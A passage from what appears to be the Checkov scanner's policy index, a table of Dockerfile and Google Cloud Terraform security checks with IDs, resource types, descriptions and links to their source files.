CKV2_DOCKER_5 | resource | RUN | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) | -| 2131 | CKV2_DOCKER_6 | resource | ARG | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) | -| 2132 | CKV2_DOCKER_6 | resource | ENV | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) | -| 2133 | CKV2_DOCKER_6 | resource | RUN | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) | -| 2134 | CKV2_DOCKER_7 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option | dockerfile | [RunApkAllowUntrusted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunApkAllowUntrusted.yaml) | -| 2135 | CKV2_DOCKER_8 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option | dockerfile | [RunAptGetAllowUnauthenticated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetAllowUnauthenticated.yaml) | -| 2136 | CKV2_DOCKER_9 | resource | RUN | Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option | dockerfile | [RunYumNoGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumNoGpgCheck.yaml) | -| 2137 | CKV2_DOCKER_10 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options | dockerfile | [RunRpmNoSignature.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunRpmNoSignature.yaml) | -| 2138 | CKV2_DOCKER_11 | resource | RUN | Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | dockerfile | [RunAptGetForceYes.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetForceYes.yaml) | -| 2139 | CKV2_DOCKER_12 | resource | ARG | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) | -| 2140 | CKV2_DOCKER_12 | resource | ENV | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) | -| 2141 | CKV2_DOCKER_12 | resource | RUN | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) | -| 2142 | CKV2_DOCKER_13 | resource | RUN | Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false | dockerfile | [RunNpmConfigSetStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunNpmConfigSetStrictSsl.yaml) | -| 2143 | CKV2_DOCKER_14 | resource | ARG | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) | -| 2144 | CKV2_DOCKER_14 | resource | ENV | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) | -| 2145 | CKV2_DOCKER_14 | resource | RUN | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) | -| 2146 | CKV2_DOCKER_15 | resource | RUN | Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option | dockerfile | [RunYumConfigManagerSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumConfigManagerSslVerify.yaml) | -| 2147 | CKV2_DOCKER_16 | resource | ARG | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) | -| 2148 | CKV2_DOCKER_16 | resource | ENV | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) | -| 2149 | CKV2_DOCKER_16 | resource | RUN | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) | -| 2150 | CKV2_DOCKER_17 | resource | RUN | Ensure that 'chpasswd' is not used to set or remove passwords | dockerfile | [RunChpasswd.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunChpasswd.yaml) | -| 2151 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) | -| 2152 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) | -| 2153 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) | -| 2154 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) | -| 2155 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) | -| 2156 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) | -| 2157 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) | -| 2158 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) | -| 2159 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) | -| 2160 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) | -| 2161 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) | -| 2162 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) | -| 2163 | CKV_GCP_14 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) | -| 2164 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) | -| 2165 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) | -| 2166 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) | -| 2167 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) | -| 2168 | CKV_GCP_20 | resource | google_container_cluster | Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) | -| 2169 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) | -| 2170 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) | -| 2171 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) | -| 2172 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) | -| 2173 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) | -| 2174 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) | -| 2175 | CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) | -| 2176 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | -| 2177 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | -| 2178 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) | -| 2179 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | -| 2180 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | -| 2181 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | -| 2182 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | -| 2183 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | -| 2184 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | -| 2185 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | -| 2186 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | -| 2187 | CKV_GCP_32 | resource | google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | -| 2188 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) | -| 2189 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | -| 2190 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | -| 2191 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | -| 2192 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | -| 2193 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | -| 2194 | CKV_GCP_35 | resource | google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | -| 2195 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | -| 2196 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | -| 2197 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | -| 2198 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) | -| 2199 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) | -| 2200 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | -| 2201 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | -| 2202 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | -| 2203 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | -| 2204 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | -| 2205 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | -| 2206 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | -| 2207 | CKV_GCP_41 | resource | google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | -| 2208 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) | -| 2209 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) | -| 2210 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | -| 2211 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | -| 2212 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | -| 2213 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | -| 2214 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | -| 2215 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | -| 2216 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | -| 2217 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | -| 2218 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | -| 2219 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | -| 2220 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | -| 2221 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | -| 2222 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) | -| 2223 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) | -| 2224 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) | -| 2225 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) | -| 2226 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) | -| 2227 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) | -| 2228 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) | -| 2229 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) | -| 2230 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) | -| 2231 | CKV_GCP_59 